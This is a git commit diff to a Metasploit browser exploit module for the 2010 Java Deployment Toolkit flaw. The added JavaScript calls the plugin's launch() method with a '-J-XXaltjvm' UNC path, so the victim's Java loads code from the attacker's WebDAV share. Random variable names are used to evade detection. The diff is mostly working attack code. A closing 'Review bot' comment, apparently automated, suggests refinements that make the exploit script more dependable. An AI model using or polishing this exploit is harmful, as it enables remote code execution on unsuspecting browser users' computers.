added support for older JREs using javascript methods from taviso's exploit
git-svn-id: file:///home/svn/framework3/trunk@9151 4d416f70-5f16-0410-b530-b9f4589650daunstable
parent
08117ca000
commit
ac188bebdb
|
@ -31,11 +31,11 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
an unsuspecting browser user.
|
||||
|
||||
This vulnerability was originally discovered independently by both Ruben
|
||||
Santamarta and Tavis Ormandy. Tavis reported that all versions since version
|
||||
Santamarta and Tavis Ormandy. Tavis reported that all versions since version
|
||||
6 Update 10 "are believed to be affected by this vulnerability."
|
||||
|
||||
|
||||
In order for this module to work, it must be ran as root on a server that
|
||||
does not serve SMB. Additionally, the target host must have the WebClient
|
||||
does not serve SMB. Additionally, the target host must have the WebClient
|
||||
service (WebDAV Mini-Redirector) enabled.
|
||||
},
|
||||
'License' => MSF_LICENSE,
|
||||
|
@ -70,7 +70,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
'DefaultTarget' => 0,
|
||||
'DisclosureDate' => 'Apr 09 2010'
|
||||
))
|
||||
|
||||
|
||||
register_options(
|
||||
[
|
||||
OptPort.new('SRVPORT', [ true, "The daemon port to listen on", 80 ]),
|
||||
|
@ -196,10 +196,21 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
jnlp = "-J-XXaltjvm=" + unc + " " + rand_text_alphanumeric(8+rand(8)) + ".jnlp"
|
||||
docbase = ""
|
||||
|
||||
# for the javascript version
|
||||
var_obj = rand_text_alpha(8+rand(8))
|
||||
var_str = rand_text_alpha(8+rand(8))
|
||||
var_obj2 = rand_text_alpha(8+rand(8))
|
||||
var_obj3 = rand_text_alpha(8+rand(8))
|
||||
js_jnlp = "http: "
|
||||
js_jnlp << jnlp.dup.gsub("\\", "\\\\\\\\") # jeez
|
||||
|
||||
# The 8ad.. CLSID doesn't support the launch method ...
|
||||
#clsid = '8AD9C840-044E-11D1-B3E9-00805F499D93'
|
||||
clsid = 'CAFEEFAC-DEC7-0000-0000-ABCDEFFEDCBA'
|
||||
html = %Q|<html>
|
||||
<body>
|
||||
<object classid="clsid:8AD9C840-044E-11D1-B3E9-00805F499D93"
|
||||
width="100%" height="100%">
|
||||
<object id="#{var_obj}" classid="clsid:#{clsid}"
|
||||
width="0" height="0">
|
||||
<PARAM name="launchjnlp" value="#{jnlp}">
|
||||
<PARAM name="docbase" value="#{docbase}">
|
||||
</object>
|
||||
|
@ -208,6 +219,24 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
launchjnlp="#{jnlp}"
|
||||
docbase="#{docbase}"
|
||||
/>
|
||||
<script language="javascript">
|
||||
var #{var_str} = "#{js_jnlp}";
|
||||
if (window.navigator.appName == "Microsoft Internet Explorer") {
|
||||
#{var_obj}.launch(#{var_str});
|
||||
} else {
|
||||
try {
|
||||
var #{var_obj2} = document.createElement("OBJECT");
|
||||
#{var_obj2}.type = "application/npruntime-scriptable-plugin;deploymenttoolkit";
|
||||
document.body.appendChild(#{var_obj2});
|
||||
#{var_obj2}.launch(#{var_str});
|
||||
} catch (e) {
|
||||
var #{var_obj3} = document.createElement("OBJECT");
|
||||
#{var_obj3}.type = "application/java-deployment-toolkit";
|
||||
document.body.appendChild(#{var_obj3});
|
||||
#{var_obj3}.launch(#{var_str});
|
||||
}
|
||||
}
|
||||
</script>
|
||||
</body>
|
||||
</html>
|
||||
|
|
||||
|
@ -267,13 +296,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
</D:response>
|
||||
</D:multistatus>
|
||||
|
|
||||
=begin
|
||||
# We don't have these things
|
||||
elsif (path =~ /\.manifest$/i) or (path =~ /\.config$/i) or (path =~ /\.exe/i)
|
||||
print_status("Sending 404 for #{path} ...")
|
||||
send_not_found(cli)
|
||||
return
|
||||
=end
|
||||
|
||||
elsif (path =~ /\/$/) or (not path.sub('/', '').index('/'))
|
||||
# Response for anything else (generally just /)
|
||||
print_status("Sending directory multistatus for #{path} ...")
|
||||
|
|
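Review bot: In the third hunk the `.dup` on `jnlp.dup.gsub("\\", "\\\\\\\\")` is redundant, since `gsub` already returns a new string and never mutates its receiver, and the eight-backslash replacement (flagged by the author's own `# jeez`) is hard to read because it is escaped once for the Ruby literal and again for the gsub replacement syntax. The block form avoids the second level of escaping and makes the intent explicit: `# each \ in the UNC path must reach the JS string literal as \\` followed by `js_jnlp << jnlp.gsub("\\") { "\\\\" }`. A smaller point in the same hunk: `var_obj`, `var_str`, `var_obj2` and `var_obj3` are drawn independently from `rand_text_alpha(8+rand(8))`, so a collision is improbable but would break the generated script (for example `var x = "…"; x.launch(x);`); drawing them until unique, or deriving them from one random stem with distinct suffixes, would close that gap. The method containing this hunk starts before it and continues past the fourth hunk, so the surrounding control flow is not visible here.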